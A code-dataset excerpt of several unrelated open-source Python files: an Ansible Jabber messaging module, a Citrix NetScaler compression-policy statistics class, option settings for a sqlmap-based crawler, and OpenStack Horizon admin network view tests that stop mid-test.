# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>
ANSIBLE_METADATA = {'status': ['stableinterface'],
'supported_by': 'committer',
'version': '1.0'}
DOCUMENTATION = '''
---
version_added: "1.2"
module: jabber
short_description: Send a message to jabber user or chat room
description:
- Send a message to jabber
options:
user:
description:
- User as which to connect
required: true
password:
description:
- password for user to connect
required: true
to:
description:
- user ID or name of the room, when using room use a slash to indicate your nick.
required: true
msg:
description:
- The message body.
required: true
default: null
host:
description:
- host to connect, overrides user info
required: false
port:
description:
- port to connect to, overrides default
required: false
default: 5222
encoding:
description:
- message encoding
required: false
# informational: requirements for nodes
requirements:
- python xmpp (xmpppy)
author: "Brian Coca (@bcoca)"
'''
EXAMPLES = '''
# send a message to a user
- jabber:
user: [email protected]
password: secret
to: [email protected]
msg: Ansible task finished
# send a message to a room
- jabber:
user: [email protected]
password: secret
to: [email protected]/ansiblebot
msg: Ansible task finished
# send a message, specifying the host and port
- jabber
user: [email protected]
host: talk.example.net
port: 5223
password: secret
to: [email protected]
msg: Ansible task finished
'''
import os
import re
import time
HAS_XMPP = True
try:
import xmpp
except ImportError:
HAS_XMPP = False
def main():
module = AnsibleModule(
argument_spec=dict(
user=dict(required=True),
password=dict(required=True, no_log=True),
to=dict(required=True),
msg=dict(required=True),
host=dict(required=False),
port=dict(required=False,default=5222),
encoding=dict(required=False),
),
supports_check_mode=True
)
if not HAS_XMPP:
module.fail_json(msg="The required python xmpp library (xmpppy) is not installed")
jid = xmpp.JID(module.params['user'])
user = jid.getNode()
server = jid.getDomain()
port = module.params['port']
password = module.params['password']
try:
to, nick = module.params['to'].split('/', 1)
except ValueError:
to, nick = module.params['to'], None
if module.params['host']:
host = module.params['host']
else:
host = server
if module.params['encoding']:
xmpp.simplexml.ENCODING = params['encoding']
msg = xmpp.protocol.Message(body=module.params['msg'])
try:
conn=xmpp.Client(server, debug=[])
if not conn.connect(server=(host,port)):
module.fail_json(rc=1, msg='Failed to connect to server: %s' % (server))
if not conn.auth(user,password,'Ansible'):
module.fail_json(rc=1, msg='Failed to authorize %s on: %s' % (user,server))
# some old servers require this, also the sleep following send
conn.sendInitPresence(requestRoster=0)
if nick: # sending to room instead of user, need to join
msg.setType('groupchat')
msg.setTag('x', namespace='http://jabber.org/protocol/muc#user')
conn.send(xmpp.Presence(to=module.params['to']))
time.sleep(1)
else:
msg.setType('chat')
msg.setTo(to)
if not module.check_mode:
conn.send(msg)
time.sleep(1)
conn.disconnect()
except Exception:
e = get_exception()
module.fail_json(msg="unable to send msg: %s" % e)
module.exit_json(changed=False, to=to, user=user, msg=msg.getBody())
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.pycompat24 import get_exception
if __name__ == '__main__':
main()
| mit | -4,918,418,581,439,076,000 | 26.221591 | 90 | 0.637863 | false |
mahabs/nitro | nssrc/com/citrix/netscaler/nitro/resource/stat/cmp/cmppolicy_stats.py | 1 | 4510 | #
# Copyright (c) 2008-2015 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class cmppolicy_stats(base_resource) :
""" Statistics for compression policy resource.
"""
def __init__(self) :
self._name = ""
self._clearstats = ""
self._pipolicyhits = 0
self._pipolicyhitsrate = 0
self._pipolicyundefhits = 0
self._pipolicyundefhitsrate = 0
@property
def name(self) :
"""Name of the advanced compression policy for which to display statistics. If no name is specified, statistics for all advanced compression polices are shown.<br/>Minimum length = 1.
"""
try :
return self._name
except Exception as e:
raise e
@name.setter
def name(self, name) :
"""Name of the advanced compression policy for which to display statistics. If no name is specified, statistics for all advanced compression polices are shown.
"""
try :
self._name = name
except Exception as e:
raise e
@property
def clearstats(self) :
"""Clear the statsistics / counters.<br/>Possible values = basic, full.
"""
try :
return self._clearstats
except Exception as e:
raise e
@clearstats.setter
def clearstats(self, clearstats) :
"""Clear the statsistics / counters
"""
try :
self._clearstats = clearstats
except Exception as e:
raise e
@property
def pipolicyundefhitsrate(self) :
"""Rate (/s) counter for pipolicyundefhits.
"""
try :
return self._pipolicyundefhitsrate
except Exception as e:
raise e
@property
def pipolicyundefhits(self) :
"""Number of undef hits on the policy.
"""
try :
return self._pipolicyundefhits
except Exception as e:
raise e
@property
def pipolicyhitsrate(self) :
"""Rate (/s) counter for pipolicyhits.
"""
try :
return self._pipolicyhitsrate
except Exception as e:
raise e
@property
def pipolicyhits(self) :
"""Number of hits on the policy.
"""
try :
return self._pipolicyhits
except Exception as e:
raise e
def _get_nitro_response(self, service, response) :
""" converts nitro response into object and returns the object array in case of get request.
"""
try :
result = service.payload_formatter.string_to_resource(cmppolicy_response, response, self.__class__.__name__.replace('_stats',''))
if(result.errorcode != 0) :
if (result.errorcode == 444) :
service.clear_session(self)
if result.severity :
if (result.severity == "ERROR") :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
else :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
return result.cmppolicy
except Exception as e :
raise e
def _get_object_name(self) :
""" Returns the value of object identifier argument
"""
try :
if (self.name) :
return str(self.name)
return None
except Exception as e :
raise e
@classmethod
def get(cls, service, name="", option_="") :
""" Use this API to fetch the statistics of all cmppolicy_stats resources that are configured on netscaler.
"""
try :
obj = cmppolicy_stats()
if not name :
response = obj.stat_resources(service, option_)
else :
obj.name = name
response = obj.stat_resource(service, option_)
return response
except Exception as e:
raise e
class Clearstats:
basic = "basic"
full = "full"
class cmppolicy_response(base_response) :
def __init__(self, length=1) :
self.cmppolicy = []
self.errorcode = 0
self.message = ""
self.severity = ""
self.sessionid = ""
self.cmppolicy = [cmppolicy_stats() for _ in range(length)]
| apache-2.0 | 6,867,825,718,209,409,000 | 26.668712 | 186 | 0.700443 | false |
CvvT/crawler_sqlmap | crawler/setting.py | 1 | 2588 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# __author__ = 'CwT'
import logging
from optparse import OptionParser
parser = OptionParser()
parser.add_option("-d", "--depth", dest="depth", action="store", default=-1, type="int",
help="the distance from a starting location")
parser.add_option("--nocheckhost", dest="nocheckhost", action="store_true", default=False,
help="don't check host for crawler")
parser.add_option("--level", dest="level", action="store", default=1, type="int",
help="sqlmap scan level(from 1-5, default 1)")
parser.add_option("--timeout", dest="timeout", action="store", default=30, type="int",
help="sqlmap timeout for each task")
parser.add_option("-u", "--url", dest="url", action="store", default=None,
help="target url")
parser.add_option("--test", dest="test", action="store_true", default=False,
help="developer used only")
parser.add_option("--threads", dest="threads", action="store", default=1, type="int",
help="Max number of concurrent HTTP(s) requests (default 1)")
parser.add_option("-o", "--output", dest="output", action="store", default=".",
help="directory for report file")
parser.add_option("-e", "--experiment", dest="expr", action="store_true", default=False,
help="enable experiment features")
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
Default = {
"depth": -1,
"nocheckhost": False,
"level": 1,
"url": None,
"threads": 1,
"timeout": 30,
"output": ".",
"test": False,
"experiment": False
}
class Setting(object):
def __init__(self, handle=False):
self.__dict__.update(Default)
if handle:
options, argv = parser.parse_args()
setattr(self, "url", options.url)
setattr(self, "threads", options.threads)
setattr(self, "timeout", options.timeout)
setattr(self, "output", options.output)
setattr(self, "depth", options.depth)
setattr(self, "level", options.level)
if options.nocheckhost: setattr(self, "nocheckhost", True)
if options.expr: setattr(self, "experiment", True)
if options.test: setattr(self, "test", True)
def __setattr__(self, key, value):
self.__dict__[key] = value
def __getattr__(self, item):
return self.__dict__[item]
def display(self):
for k, v in self.__dict__.items():
logger.debug("%s: %s" % (k, v))
| apache-2.0 | -6,516,038,691,293,704,000 | 35.971429 | 90 | 0.584621 | false |
flochaz/horizon | openstack_dashboard/dashboards/admin/networks/tests.py | 6 | 65522 | # Copyright 2012 NEC Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.core.urlresolvers import reverse
from django import http
from horizon.workflows import views
from mox import IsA # noqa
from openstack_dashboard import api
from openstack_dashboard.dashboards.project.networks import tests
from openstack_dashboard.test import helpers as test
INDEX_URL = reverse('horizon:admin:networks:index')
class NetworkTests(test.BaseAdminViewTests):
@test.create_stubs({api.neutron: ('network_list',
'list_dhcp_agent_hosting_networks',
'is_extension_supported'),
api.keystone: ('tenant_list',)})
def test_index(self):
tenants = self.tenants.list()
api.neutron.network_list(IsA(http.HttpRequest)) \
.AndReturn(self.networks.list())
api.keystone.tenant_list(IsA(http.HttpRequest))\
.AndReturn([tenants, False])
for network in self.networks.list():
api.neutron.list_dhcp_agent_hosting_networks(IsA(http.HttpRequest),
network.id)\
.AndReturn(self.agents.list())
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'dhcp_agent_scheduler').AndReturn(True)
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'dhcp_agent_scheduler').AndReturn(True)
self.mox.ReplayAll()
res = self.client.get(INDEX_URL)
self.assertTemplateUsed(res, 'admin/networks/index.html')
networks = res.context['networks_table'].data
self.assertItemsEqual(networks, self.networks.list())
@test.create_stubs({api.neutron: ('network_list',
'is_extension_supported',)})
def test_index_network_list_exception(self):
api.neutron.network_list(IsA(http.HttpRequest)) \
.AndRaise(self.exceptions.neutron)
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'dhcp_agent_scheduler').AndReturn(True)
self.mox.ReplayAll()
res = self.client.get(INDEX_URL)
self.assertTemplateUsed(res, 'admin/networks/index.html')
self.assertEqual(len(res.context['networks_table'].data), 0)
self.assertMessageCount(res, error=1)
@test.create_stubs({api.neutron: ('network_get',
'subnet_list',
'port_list',
'list_dhcp_agent_hosting_networks',
'is_extension_supported')})
def test_network_detail(self):
self._test_network_detail()
@test.create_stubs({api.neutron: ('network_get',
'subnet_list',
'port_list',
'is_extension_supported',
'list_dhcp_agent_hosting_networks',)})
def test_network_detail_with_mac_learning(self):
self._test_network_detail(mac_learning=True)
def _test_network_detail(self, mac_learning=False):
network_id = self.networks.first().id
api.neutron.list_dhcp_agent_hosting_networks(IsA(http.HttpRequest),
network_id).\
AndReturn(self.agents.list())
api.neutron.network_get(IsA(http.HttpRequest), network_id)\
.AndReturn(self.networks.first())
api.neutron.subnet_list(IsA(http.HttpRequest), network_id=network_id)\
.AndReturn([self.subnets.first()])
api.neutron.port_list(IsA(http.HttpRequest), network_id=network_id)\
.AndReturn([self.ports.first()])
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'mac-learning')\
.AndReturn(mac_learning)
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'dhcp_agent_scheduler').AndReturn(True)
self.mox.ReplayAll()
res = self.client.get(reverse('horizon:admin:networks:detail',
args=[network_id]))
self.assertTemplateUsed(res, 'project/networks/detail.html')
subnets = res.context['subnets_table'].data
ports = res.context['ports_table'].data
self.assertItemsEqual(subnets, [self.subnets.first()])
self.assertItemsEqual(ports, [self.ports.first()])
@test.create_stubs({api.neutron: ('network_get',
'subnet_list',
'port_list',
'is_extension_supported',
'list_dhcp_agent_hosting_networks',)})
def test_network_detail_network_exception(self):
self._test_network_detail_network_exception()
@test.create_stubs({api.neutron: ('network_get',
'subnet_list',
'port_list',
'is_extension_supported',
'list_dhcp_agent_hosting_networks',)})
def test_network_detail_network_exception_with_mac_learning(self):
self._test_network_detail_network_exception(mac_learning=True)
def _test_network_detail_network_exception(self, mac_learning=False):
network_id = self.networks.first().id
api.neutron.network_get(IsA(http.HttpRequest), network_id)\
.AndRaise(self.exceptions.neutron)
api.neutron.subnet_list(IsA(http.HttpRequest), network_id=network_id)\
.AndReturn([self.subnets.first()])
api.neutron.port_list(IsA(http.HttpRequest), network_id=network_id)\
.AndReturn([self.ports.first()])
api.neutron.list_dhcp_agent_hosting_networks(IsA(http.HttpRequest),
network_id).\
AndReturn(self.agents.list())
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'mac-learning')\
.AndReturn(mac_learning)
self.mox.ReplayAll()
url = reverse('horizon:admin:networks:detail', args=[network_id])
res = self.client.get(url)
redir_url = INDEX_URL
self.assertRedirectsNoFollow(res, redir_url)
@test.create_stubs({api.neutron: ('network_get',
'subnet_list',
'port_list',
'list_dhcp_agent_hosting_networks',
'is_extension_supported')})
def test_network_detail_subnet_exception(self):
self._test_network_detail_subnet_exception()
@test.create_stubs({api.neutron: ('network_get',
'subnet_list',
'port_list',
'is_extension_supported',
'list_dhcp_agent_hosting_networks',)})
def test_network_detail_subnet_exception_with_mac_learning(self):
self._test_network_detail_subnet_exception(mac_learning=True)
def _test_network_detail_subnet_exception(self, mac_learning=False):
network_id = self.networks.first().id
api.neutron.list_dhcp_agent_hosting_networks(IsA(http.HttpRequest),
network_id).\
AndReturn(self.agents.list())
api.neutron.network_get(IsA(http.HttpRequest), network_id).\
AndReturn(self.networks.first())
api.neutron.subnet_list(IsA(http.HttpRequest), network_id=network_id).\
AndRaise(self.exceptions.neutron)
api.neutron.port_list(IsA(http.HttpRequest), network_id=network_id).\
AndReturn([self.ports.first()])
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'mac-learning')\
.AndReturn(mac_learning)
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'dhcp_agent_scheduler').AndReturn(True)
self.mox.ReplayAll()
res = self.client.get(reverse('horizon:admin:networks:detail',
args=[network_id]))
self.assertTemplateUsed(res, 'project/networks/detail.html')
subnets = res.context['subnets_table'].data
ports = res.context['ports_table'].data
self.assertEqual(len(subnets), 0)
self.assertItemsEqual(ports, [self.ports.first()])
@test.create_stubs({api.neutron: ('network_get',
'subnet_list',
'port_list',
'is_extension_supported',
'list_dhcp_agent_hosting_networks',)})
def test_network_detail_port_exception(self):
self._test_network_detail_port_exception()
@test.create_stubs({api.neutron: ('network_get',
'subnet_list',
'port_list',
'is_extension_supported',
'list_dhcp_agent_hosting_networks',)})
def test_network_detail_port_exception_with_mac_learning(self):
self._test_network_detail_port_exception(mac_learning=True)
def _test_network_detail_port_exception(self, mac_learning=False):
network_id = self.networks.first().id
api.neutron.list_dhcp_agent_hosting_networks(IsA(http.HttpRequest),
network_id).\
AndReturn(self.agents.list())
api.neutron.network_get(IsA(http.HttpRequest), network_id).\
AndReturn(self.networks.first())
api.neutron.subnet_list(IsA(http.HttpRequest), network_id=network_id).\
AndReturn([self.subnets.first()])
api.neutron.port_list(IsA(http.HttpRequest), network_id=network_id).\
AndRaise(self.exceptions.neutron)
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'mac-learning')\
.AndReturn(mac_learning)
self.mox.ReplayAll()
res = self.client.get(reverse('horizon:admin:networks:detail',
args=[network_id]))
self.assertTemplateUsed(res, 'project/networks/detail.html')
subnets = res.context['subnets_table'].data
ports = res.context['ports_table'].data
self.assertItemsEqual(subnets, [self.subnets.first()])
self.assertEqual(len(ports), 0)
@test.create_stubs({api.neutron: ('profile_list',
'list_extensions',),
api.keystone: ('tenant_list',)})
def test_network_create_get(self,
test_with_profile=False):
tenants = self.tenants.list()
extensions = self.api_extensions.list()
api.keystone.tenant_list(IsA(
http.HttpRequest)).AndReturn([tenants, False])
if test_with_profile:
net_profiles = self.net_profiles.list()
api.neutron.profile_list(IsA(http.HttpRequest),
'network').AndReturn(net_profiles)
api.neutron.list_extensions(
IsA(http.HttpRequest)).AndReturn(extensions)
self.mox.ReplayAll()
url = reverse('horizon:admin:networks:create')
res = self.client.get(url)
self.assertTemplateUsed(res, 'admin/networks/create.html')
@test.update_settings(
OPENSTACK_NEUTRON_NETWORK={'profile_support': 'cisco'})
def test_network_create_get_with_profile(self):
self.test_network_create_get(test_with_profile=True)
@test.create_stubs({api.neutron: ('network_create',
'profile_list',
'list_extensions',),
api.keystone: ('tenant_list',)})
def test_network_create_post(self,
test_with_profile=False):
tenants = self.tenants.list()
tenant_id = self.tenants.first().id
network = self.networks.first()
extensions = self.api_extensions.list()
api.keystone.tenant_list(IsA(http.HttpRequest))\
.AndReturn([tenants, False])
params = {'name': network.name,
'tenant_id': tenant_id,
'admin_state_up': network.admin_state_up,
'router:external': True,
'shared': True,
'provider:network_type': 'local'}
if test_with_profile:
net_profiles = self.net_profiles.list()
net_profile_id = self.net_profiles.first().id
api.neutron.profile_list(IsA(http.HttpRequest),
'network').AndReturn(net_profiles)
params['net_profile_id'] = net_profile_id
api.neutron.list_extensions(
IsA(http.HttpRequest)).AndReturn(extensions)
api.neutron.network_create(IsA(http.HttpRequest), **params)\
.AndReturn(network)
self.mox.ReplayAll()
form_data = {'tenant_id': tenant_id,
'name': network.name,
'admin_state': network.admin_state_up,
'external': True,
'shared': True,
'network_type': 'local'}
if test_with_profile:
form_data['net_profile_id'] = net_profile_id
url = reverse('horizon:admin:networks:create')
res = self.client.post(url, form_data)
self.assertNoFormErrors(res)
self.assertRedirectsNoFollow(res, INDEX_URL)
@test.update_settings(
OPENSTACK_NEUTRON_NETWORK={'profile_support': 'cisco'})
def test_network_create_post_with_profile(self):
self.test_network_create_post(test_with_profile=True)
@test.create_stubs({api.neutron: ('network_create',
'profile_list',
'list_extensions',),
api.keystone: ('tenant_list',)})
def test_network_create_post_network_exception(self,
test_with_profile=False):
tenants = self.tenants.list()
tenant_id = self.tenants.first().id
network = self.networks.first()
extensions = self.api_extensions.list()
api.keystone.tenant_list(IsA(http.HttpRequest)).AndReturn([tenants,
False])
params = {'name': network.name,
'tenant_id': tenant_id,
'admin_state_up': network.admin_state_up,
'router:external': True,
'shared': False,
'provider:network_type': 'local'}
if test_with_profile:
net_profiles = self.net_profiles.list()
net_profile_id = self.net_profiles.first().id
api.neutron.profile_list(IsA(http.HttpRequest),
'network').AndReturn(net_profiles)
params['net_profile_id'] = net_profile_id
api.neutron.list_extensions(
IsA(http.HttpRequest)).AndReturn(extensions)
api.neutron.network_create(IsA(http.HttpRequest),
**params).AndRaise(self.exceptions.neutron)
self.mox.ReplayAll()
form_data = {'tenant_id': tenant_id,
'name': network.name,
'admin_state': network.admin_state_up,
'external': True,
'shared': False,
'network_type': 'local'}
if test_with_profile:
form_data['net_profile_id'] = net_profile_id
url = reverse('horizon:admin:networks:create')
res = self.client.post(url, form_data)
self.assertNoFormErrors(res)
self.assertRedirectsNoFollow(res, INDEX_URL)
@test.update_settings(
OPENSTACK_NEUTRON_NETWORK={'profile_support': 'cisco'})
def test_network_create_post_network_exception_with_profile(self):
self.test_network_create_post_network_exception(
test_with_profile=True)
@test.create_stubs({api.neutron: ('list_extensions',),
api.keystone: ('tenant_list',)})
def test_network_create_vlan_segmentation_id_invalid(self):
tenants = self.tenants.list()
tenant_id = self.tenants.first().id
network = self.networks.first()
extensions = self.api_extensions.list()
api.keystone.tenant_list(IsA(http.HttpRequest)).AndReturn([tenants,
False])
api.neutron.list_extensions(
IsA(http.HttpRequest)).AndReturn(extensions)
self.mox.ReplayAll()
form_data = {'tenant_id': tenant_id,
'name': network.name,
'admin_state': network.admin_state_up,
'external': True,
'shared': False,
'network_type': 'vlan',
'physical_network': 'default',
'segmentation_id': 4095}
url = reverse('horizon:admin:networks:create')
res = self.client.post(url, form_data)
self.assertFormErrors(res, 1)
self.assertContains(res, "1 through 4094")
@test.create_stubs({api.neutron: ('list_extensions',),
api.keystone: ('tenant_list',)})
def test_network_create_gre_segmentation_id_invalid(self):
tenants = self.tenants.list()
tenant_id = self.tenants.first().id
network = self.networks.first()
extensions = self.api_extensions.list()
api.keystone.tenant_list(IsA(http.HttpRequest)).AndReturn([tenants,
False])
api.neutron.list_extensions(
IsA(http.HttpRequest)).AndReturn(extensions)
self.mox.ReplayAll()
form_data = {'tenant_id': tenant_id,
'name': network.name,
'admin_state': network.admin_state_up,
'external': True,
'shared': False,
'network_type': 'gre',
'physical_network': 'default',
'segmentation_id': (2 ** 32) + 1}
url = reverse('horizon:admin:networks:create')
res = self.client.post(url, form_data)
self.assertFormErrors(res, 1)
self.assertContains(res, "0 through %s" % ((2 ** 32) - 1))
@test.create_stubs({api.neutron: ('list_extensions',),
api.keystone: ('tenant_list',)})
@test.update_settings(
OPENSTACK_NEUTRON_NETWORK={
'segmentation_id_range': {'vxlan': [10, 20]}})
def test_network_create_vxlan_segmentation_id_custom(self):
tenants = self.tenants.list()
tenant_id = self.tenants.first().id
network = self.networks.first()
extensions = self.api_extensions.list()
api.keystone.tenant_list(IsA(http.HttpRequest)).AndReturn([tenants,
False])
api.neutron.list_extensions(
IsA(http.HttpRequest)).AndReturn(extensions)
self.mox.ReplayAll()
form_data = {'tenant_id': tenant_id,
'name': network.name,
'admin_state': network.admin_state_up,
'external': True,
'shared': False,
'network_type': 'vxlan',
'physical_network': 'default',
'segmentation_id': 9}
url = reverse('horizon:admin:networks:create')
res = self.client.post(url, form_data)
self.assertFormErrors(res, 1)
self.assertContains(res, "10 through 20")
@test.create_stubs({api.neutron: ('list_extensions',),
api.keystone: ('tenant_list',)})
@test.update_settings(
OPENSTACK_NEUTRON_NETWORK={
'supported_provider_types': []})
def test_network_create_no_provider_types(self):
tenants = self.tenants.list()
extensions = self.api_extensions.list()
api.keystone.tenant_list(IsA(http.HttpRequest)).AndReturn([tenants,
False])
api.neutron.list_extensions(
IsA(http.HttpRequest)).AndReturn(extensions)
self.mox.ReplayAll()
url = reverse('horizon:admin:networks:create')
res = self.client.get(url)
self.assertTemplateUsed(res, 'admin/networks/create.html')
self.assertContains(res, '<input type="hidden" name="network_type" '
'id="id_network_type" />', html=True)
@test.create_stubs({api.neutron: ('list_extensions',),
api.keystone: ('tenant_list',)})
@test.update_settings(
OPENSTACK_NEUTRON_NETWORK={
'supported_provider_types': ['local', 'flat', 'gre']})
def test_network_create_unsupported_provider_types(self):
tenants = self.tenants.list()
extensions = self.api_extensions.list()
api.keystone.tenant_list(IsA(http.HttpRequest)).AndReturn([tenants,
False])
api.neutron.list_extensions(
IsA(http.HttpRequest)).AndReturn(extensions)
self.mox.ReplayAll()
url = reverse('horizon:admin:networks:create')
res = self.client.get(url)
self.assertTemplateUsed(res, 'admin/networks/create.html')
network_type = res.context['form'].fields['network_type']
self.assertListEqual(list(network_type.choices), [('local', 'Local'),
('flat', 'Flat'),
('gre', 'GRE')])
@test.create_stubs({api.neutron: ('network_get',)})
def test_network_update_get(self):
network = self.networks.first()
api.neutron.network_get(IsA(http.HttpRequest), network.id)\
.AndReturn(network)
self.mox.ReplayAll()
url = reverse('horizon:admin:networks:update', args=[network.id])
res = self.client.get(url)
self.assertTemplateUsed(res, 'admin/networks/update.html')
@test.create_stubs({api.neutron: ('network_get',)})
def test_network_update_get_exception(self):
network = self.networks.first()
api.neutron.network_get(IsA(http.HttpRequest), network.id)\
.AndRaise(self.exceptions.neutron)
self.mox.ReplayAll()
url = reverse('horizon:admin:networks:update', args=[network.id])
res = self.client.get(url)
redir_url = INDEX_URL
self.assertRedirectsNoFollow(res, redir_url)
@test.create_stubs({api.neutron: ('network_update',
'network_get',)})
def test_network_update_post(self):
network = self.networks.first()
params = {'name': network.name,
'shared': True,
'admin_state_up': network.admin_state_up,
'router:external': True}
api.neutron.network_update(IsA(http.HttpRequest), network.id,
**params)\
.AndReturn(network)
api.neutron.network_get(IsA(http.HttpRequest), network.id)\
.AndReturn(network)
self.mox.ReplayAll()
form_data = {'network_id': network.id,
'name': network.name,
'tenant_id': network.tenant_id,
'admin_state': network.admin_state_up,
'shared': True,
'external': True}
url = reverse('horizon:admin:networks:update', args=[network.id])
res = self.client.post(url, form_data)
self.assertRedirectsNoFollow(res, INDEX_URL)
@test.create_stubs({api.neutron: ('network_update',
'network_get',)})
def test_network_update_post_exception(self):
network = self.networks.first()
params = {'name': network.name,
'shared': False,
'admin_state_up': network.admin_state_up,
'router:external': False}
api.neutron.network_update(IsA(http.HttpRequest), network.id,
**params)\
.AndRaise(self.exceptions.neutron)
api.neutron.network_get(IsA(http.HttpRequest), network.id)\
.AndReturn(network)
self.mox.ReplayAll()
form_data = {'network_id': network.id,
'name': network.name,
'tenant_id': network.tenant_id,
'admin_state': network.admin_state_up,
'shared': False,
'external': False}
url = reverse('horizon:admin:networks:update', args=[network.id])
res = self.client.post(url, form_data)
self.assertRedirectsNoFollow(res, INDEX_URL)
@test.create_stubs({api.neutron: ('network_list',
'network_delete',
'list_dhcp_agent_hosting_networks',
'is_extension_supported'),
api.keystone: ('tenant_list',)})
def test_delete_network(self):
tenants = self.tenants.list()
network = self.networks.first()
api.neutron.list_dhcp_agent_hosting_networks(IsA(http.HttpRequest),
network.id).\
AndReturn(self.agents.list())
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'dhcp_agent_scheduler').AndReturn(True)
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'dhcp_agent_scheduler').AndReturn(True)
api.keystone.tenant_list(IsA(http.HttpRequest))\
.AndReturn([tenants, False])
api.neutron.network_list(IsA(http.HttpRequest))\
.AndReturn([network])
api.neutron.network_delete(IsA(http.HttpRequest), network.id)
self.mox.ReplayAll()
form_data = {'action': 'networks__delete__%s' % network.id}
res = self.client.post(INDEX_URL, form_data)
self.assertRedirectsNoFollow(res, INDEX_URL)
@test.create_stubs({api.neutron: ('network_list',
'network_delete',
'list_dhcp_agent_hosting_networks',
'is_extension_supported'),
api.keystone: ('tenant_list',)})
def test_delete_network_exception(self):
tenants = self.tenants.list()
network = self.networks.first()
api.neutron.list_dhcp_agent_hosting_networks(IsA(http.HttpRequest),
network.id).\
AndReturn(self.agents.list())
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'dhcp_agent_scheduler').AndReturn(True)
api.neutron.is_extension_supported(IsA(http.HttpRequest),
'dhcp_agent_scheduler').AndReturn(True)
api.keystone.tenant_list(IsA(http.HttpRequest))\
.AndReturn([tenants, False])
api.neutron.network_list(IsA(http.HttpRequest))\
.AndReturn([network])
api.neutron.network_delete(IsA(http.HttpRequest), network.id)\
.AndRaise(self.exceptions.neutron)
self.mox.ReplayAll()
form_data = {'action': 'networks__delete__%s' % network.id}
res = self.client.post(INDEX_URL, form_data)
self.assertRedirectsNoFollow(res, INDEX_URL)
class NetworkSubnetTests(test.BaseAdminViewTests):
@test.create_stubs({api.neutron: ('subnet_get',)})
def test_subnet_detail(self):
subnet = self.subnets.first()
api.neutron.subnet_get(IsA(http.HttpRequest), subnet.id)\
.AndReturn(self.subnets.first())
self.mox.ReplayAll()
url = reverse('horizon:admin:networks:subnets:detail',
args=[subnet.id])
res = self.client.get(url)
self.assertTemplateUsed(res, 'project/networks/subnets/detail.html')
self.assertEqual(res.context['subnet'].id, subnet.id)
@test.create_stubs({api.neutron: ('subnet_get',)})
def test_subnet_detail_exception(self):
subnet = self.subnets.first()
api.neutron.subnet_get(IsA(http.HttpRequest), subnet.id)\
.AndRaise(self.exceptions.neutron)
self.mox.ReplayAll()
url = reverse('horizon:admin:networks:subnets:detail',
args=[subnet.id])
res = self.client.get(url)
# admin DetailView is shared with userpanel one, so
# redirection URL on error is userpanel index.
redir_url = reverse('horizon:project:networks:index')
self.assertRedirectsNoFollow(res, redir_url)
@test.create_stubs({api.neutron: ('network_get',)})
def test_subnet_create_get(self):
network = self.networks.first()
api.neutron.network_get(IsA(http.HttpRequest),
network.id)\
.AndReturn(self.networks.first())
self.mox.ReplayAll()
url = reverse('horizon:admin:networks:addsubnet',
args=[network.id])
res = self.client.get(url)
self.assertTemplateUsed(res, views.WorkflowView.template_name)
@test.create_stubs({api.neutron: ('network_get',
'subnet_create',)})
def test_subnet_create_post(self):
network = self.networks.first()
subnet = self.subnets.first()
api.neutron.network_get(IsA(http.HttpRequest),
network.id)\
.AndReturn(self.networks.first())
api.neutron.network_get(IsA(http.HttpRequest),
network.id)\
.AndReturn(self.networks.first())
api.neutron.subnet_create(IsA(http.HttpRequest),
network_id=network.id,
name=subnet.name,
cidr=subnet.cidr,
ip_version=subnet.ip_version,
gateway_ip=subnet.gateway_ip,
enable_dhcp=subnet.enable_dhcp,
allocation_pools=subnet.allocation_pools,
tenant_id=subnet.tenant_id)\
.AndReturn(subnet)
self.mox.ReplayAll()
form_data = tests.form_data_subnet(subnet)
url = reverse('horizon:admin:networks:addsubnet',
args=[subnet.network_id])
res = self.client.post(url, form_data)
self.assertNoFormErrors(res)
redir_url = reverse('horizon:admin:networks:detail',
args=[subnet.network_id])
self.assertRedirectsNoFollow(res, redir_url)
@test.create_stubs({api.neutron: ('network_get',
'subnet_create',)})
def test_subnet_create_post_network_exception(self):
network = self.networks.first()
subnet = self.subnets.first()
api.neutron.network_get(IsA(http.HttpRequest),
network.id)\
.AndRaise(self.exceptions.neutron)
self.mox.ReplayAll()
form_data = tests.form_data_subnet(subnet, allocation_pools=[])
url = reverse('horizon:admin:networks:addsubnet',
args=[subnet.network_id])
res = self.client.post(url, form_data)
self.assertNoFormErrors(res)
# admin DetailView is shared with userpanel one, so
# redirection URL on error is userpanel index.
